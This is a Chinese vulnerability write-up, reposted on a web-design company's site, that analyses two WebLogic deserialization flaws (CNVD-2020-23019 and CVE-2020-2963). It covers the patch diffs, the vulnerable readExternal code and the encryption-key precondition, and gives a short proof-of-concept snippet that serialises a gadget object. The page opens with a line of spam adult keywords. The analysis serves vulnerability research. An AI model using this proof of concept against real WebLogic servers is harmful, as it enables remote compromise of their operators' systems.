真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

怎樣進行weblogic反序列化漏洞分析與復現(xiàn)

本篇文章為大家展示了怎樣進行weblogic 反序列化漏洞分析與復現(xiàn),內(nèi)容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

目前創(chuàng)新互聯(lián)公司已為上千余家的企業(yè)提供了網(wǎng)站建設、域名、虛擬空間、網(wǎng)站托管運營、企業(yè)網(wǎng)站設計、萊西網(wǎng)站維護等服務,公司將堅持客戶導向、應用為本的策略,正道將秉承"和諧、參與、激情"的文化,與客戶和合作伙伴齊心協(xié)力一起成長,共同發(fā)展。

簡介

這兩個洞應該都是5月更新的補丁,分析時候無意中發(fā)現(xiàn)的??戳艘幌侣┒赐唵危褪抢糜悬c苛刻

SOAPInvokeState CNVD-2020-23019

diff 補丁,截圖如下 怎樣進行weblogic 反序列化漏洞分析與復現(xiàn)

可以很明顯的看出,將ObjectInputStream更改為FilterInputStream。在weblogic中,F(xiàn)ilterInputStream負責檢查反序列化的類種是否存在可以利用的Gadget,而ObjectInputStream不會。并且在類的readObject 方法中,通過T3協(xié)議反序列化默認的參數(shù)為FilterInputStream,以此來防御反序列化漏洞。

除非類的readObject中亂調(diào)用ObjectInputStream,否則是不會產(chǎn)生反序列化漏洞的。

在SOAPInvokeState的readExternal中,我們只要能走入以下的流程即可

if((flags & 1) != 0) {
try {
len = in.readInt();
byte[] bytes = new byte[len];
in.readFully(bytes);
bytes = EncryptionUtil.decrypt(bytes);
ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
ObjectInputStream in2 = new ObjectInputStream(bais);
this.subject = (AuthenticatedSubject)in2.readObject();
} catch (Exception var13) {
(new NonCatalogLogger("WebServices")).warning("Couldn't completely read SOAPInvokeState object", var13);
}

看一下writeExternal方法,被實例化的類中存在subject,就可以讓readExternal執(zhí)行上面的反序列化流程

if(this.subject != null) {
ByteArrayOutputStream var12 = new ByteArrayOutputStream();
ObjectOutputStream var13 = new ObjectOutputStream(var12);
var13.writeObject(this.subject);
var13.flush();
byte[] var5 = var12.toByteArray();
var5 = EncryptionUtil.encrypt(var5);
var1.writeInt(var5.length);
var1.write(var5);
}

當然,還下面問題

加密

在EncryptionUtil.encrypt加密時,會根據(jù)Kernel.isServer()為true,才會進行加密,否則返回原數(shù)據(jù)。 因此加密之前需要調(diào)用KernelStatus.setIsServer(true)設置狀態(tài)為true,或者強行加密。

public static byte[] encrypt(byte[] var0) {
returngetEncryptionService().encryptBytes(var0);
}

weblogic.security.internal.SerializedSystemIni#getExistingEncryptionService中,會讀取SerializedSystemIni.dat作為密鑰,也就是說,需要認證或者配合文件讀取才能利用該漏洞去攻擊weblogic

public static EncryptionService getExistingEncryptionService() {
String var0 = DomainDir.getRootDir();
String var1 = var0 + File.separator + "security"+ File.separator + "SerializedSystemIni.dat";
File var2 = new File(var1);
if(!var2.exists()) {
String var3 = var0 + File.separator + "SerializedSystemIni.dat";
File var4 = new File(var3);
if(!var4.exists()) {
returnnull;
}

var1 = var3;
}

SerializedSystemIni var5 = new SerializedSystemIni(var1);
returngetEncryptionService(var5.getTheSalt(), var5.getTheEncryptedSecretKey(), var5.getTheAESEncryptedSecretKey());

POC

魔改一下 writeExternal為下面的代碼,再反序列化即可

BadAttributeValueExpException exp = null;
try {
exp = cve_2020_2555.getBadAttributeValueExpException();
} catch (Exception e) {
e.printStackTrace();
}
out2.writeObject(exp);
out2.flush();
byte[] bytes = baos.toByteArray();
bytes = EncryptionUtil.encrypt(bytes);
out.writeInt(bytes.length);
out.write(bytes);
}

}

怎樣進行weblogic 反序列化漏洞分析與復現(xiàn)

WlsSSLAdapter CVE-2020-2963

原理一樣,詳見下面的代碼


private Object readEncryptedField(ObjectInputStream in) throws IOException, ClassNotFoundException {
int length = in.readInt();
if(length <= 0) {
returnin.readObject();
} else{
byte[] bytes = new byte[length];
in.readFully(bytes);
bytes = EncryptionUtil.decrypt(bytes);
ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
ObjectInputStream in2 = new ObjectInputStream(bais);
returnin2.readObject();
}
}

怎樣進行weblogic 反序列化漏洞分析與復現(xiàn)

上述內(nèi)容就是怎樣進行weblogic 反序列化漏洞分析與復現(xiàn),你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。


當前題目:怎樣進行weblogic反序列化漏洞分析與復現(xiàn)
當前URL:http://weahome.cn/article/gggipe.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部